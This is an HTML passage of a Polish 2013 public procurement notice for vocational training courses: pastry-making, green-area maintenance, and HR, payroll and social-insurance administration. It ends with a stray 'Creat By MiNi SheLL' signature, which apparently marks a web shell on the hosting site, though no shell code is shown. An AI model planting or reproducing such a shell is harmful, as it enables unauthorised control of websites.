-przygotowywanie wypieków i deserów,
-przygotowywanie materiałów do ozdabiania ciast i deserów oraz wykorzystanie ich,
-podawanie przygotowywanych potraw.
Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Konserwator terenów zielonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin szkolenia 120 godz. lekcyjnych ( podzielonych na moduł teoretyczny i praktyczny).  
Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników szkolenia do wykonywania pracy na stanowisku konserwatora terenów zielonych. Zajęcia powinny przygotować uczestników do pracy w charakterze pracownika, który pielęgnuje trawę, kwiaty, drzewa i krzewy w ogrodach lub parkach, będących własnością publiczną lub prywatną.

Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Kurs administracyjno - księgowy (kadry, płace, ZUS).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W programie kursu: 
KADRY:
- Regulamin pracy, ewidencja czasu pracy, 
- Nawiązywanie, rozwiązywanie i zmiana umów o pracę, 
- Urlopy pracownicze (wypoczynkowy, bezpłatny, macierzyński, wychowawczy), 
- Odpowiedzialność pracownika i pracodawcy za naruszenie przepisów prawa pracy, 
- Prowadzenie akt osobowych pracowników i ich archiwizacja, 
- Dokumentacja chorób zawodowych i wypadków przy pracy. 
PŁACE:
- Różne systemy wynagrodzeń, - Naliczanie wynagrodzeń i sporządzanie list płac,  - Opodatkowanie umów o pracę i umów cywilnoprawnych,  - Deklaracje podatkowe. 
ZUS:
1. Świadczenia pieniężne z ubezpieczenia społecznego:
- zasady ustalania prawa i zasady wypłaty zasiłków, 
- podstawa wymiaru świadczeń z ubezpieczenia społecznego, 
- zasada ustalania płatnika świadczeń, 
- dowody stanowiące podstawę wypłaty zasiłków z ubezpieczenia społecznego w razie choroby i macierzyństwa, zasady orzekania o czasowej niezdolności do pracy, 
- zasady ustalania dochodu od którego uzależnione jest prawo do zasiłku rodzinnego, 
- zasady wypłaty zasiłku rodzinnego i pielęgnacyjnego oraz niezbędne dowody służące do wypłaty, 
- ustalanie uprawnień do zasiłku wychowawczego i zasady wypłaty 
2. Rozliczenia zobowiązań z tytułu składek.
- Obowiązek ubezpieczeń społecznych wybranych grup ubezpieczonych, 
- wymiar składek, 
- obowiązek ubezpieczenia zdrowotnego, 
- dokumenty ubezpieczeniowe oraz sposób ich wypełniania /druki zgłoszeniowe, druki rozliczeniowe, dowody wpłat - ćwiczenia na drukach/. 
3. Praktyczne wdrożenie programu PŁATNIK.
Szczegółowy zakres zamówienia został opisany w specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com